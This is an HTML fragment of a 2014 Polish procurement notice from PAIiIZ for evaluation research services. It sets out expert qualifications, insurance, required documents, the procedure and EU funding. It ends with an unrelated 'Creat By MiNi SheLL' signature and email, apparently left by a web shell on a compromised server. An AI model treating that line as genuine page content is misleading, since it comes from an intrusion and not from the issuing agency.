- w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert pełnił funkcję kierownika w co najmniej 3 (trzech) projektach badawczych, przy czym:
- przedmiotem co najmniej 2 (dwóch) projektów było przeprowadzenie ewaluacji interwencji publicznych (programów, działań lub projektów),
- wartość co najmniej 1 (jednego) projektu wynosiła co najmniej 150.000 zł brutto (a w przypadku, jeżeli wartość projektu została w umowie wyrażona w walucie innej niż złoty przeliczenie nastąpi wg średniego kursu złotego ogłoszonego przez Prezesa NBP i obowiązującego w dniu podpisania  umowy na realizację usługi).
b) Ekspertem do spraw badań ilościowych, który:
- posiada wyższe wykształcenie oraz,
- w ciągu 3 lat przed upływem terminu składnia ofert, realizował co najmniej 3 projekty badawcze, w których odpowiedzialny był za przygotowanie kwestionariuszy dla badań ilościowych, w których respondentami były przedstawiciele przedsiębiorstw,
- w ciągu 3 lat przed upływem terminu składnia ofert, realizował co najmniej 
4 projekty badawcze, w których odpowiedzialny był za analizę statystyczną 
i interpretację danych pochodzących z badań ilościowych; projekty mogą powtarzać się z projektami wymaganymi w poprzednim punkcie.
c) Dwoma ekspertami do spraw badań jakościowych, z których:
- każdy posiada wyższe wykształcenie;
- każdy w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert realizował co najmniej 4 (cztery) projekty badawcze, w  których był odpowiedzialny za prowadzenie wywiadów osobistych (IDI) oraz interpretację danych pochodzących ze zrealizowanych  wywiadów,
- co najmniej jeden w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert realizował co najmniej 1 (jeden) projekt badawczy, w którym odpowiedzialny był za realizację wywiadów osobistych (IDI) z przedstawicielami kadry zarządzającej przedsiębiorstw (przedstawicielami zarządu) lub kadry kierowniczej (przedstawicielami dyrekcji); projekty mogą powtarzać się z projektami wymaganymi w poprzednim punkcie,
- co najmniej jeden w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert prowadził co najmniej 2 (dwie) grupy fokusowe w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia. 
Wyżej wymienionych funkcji w zespole nie można łączyć ze sobą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać posiadanie opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 150.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany Umowy, w rozumieniu art. 144 ust. 1 ustawy Pzp, w sytuacji:
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
2) rozwiązania lub zmiany treści umowy o dofinansowanie Projektu Program Promocji Gospodarczej Polski Wschodniej, z której finansowane jest zamówienie;
3) nieotrzymania przez Zamawiającego płatności okresowej z Instytucji Pośredniczącej, przeznaczonej na zapłatę wynagrodzenia wynikającego z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.paiz.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Agencja Informacji i Inwestycji Zagranicznych S.A. w Warszawie
ul. Bagatela 12, 00-585 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 11:00, miejsce: Polska Agencja Informacji i Inwestycji Zagranicznych S.A. w Warszawie, 
ul. Bagatela 12, 00-585 Warszawa - Kancelaria Ogólna PAIiIZ, I piętro, 
p. 111. Kancelaria działa w godz. 9:00-16:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Unii Europejskiej w ramach projektu Program Promocji Gospodarczej Polski Wschodniej w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013 Osi priorytetowej I Nowoczesna Gospodarka Działanie I.4 Promocja i Współpraca, komponent Promocja..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com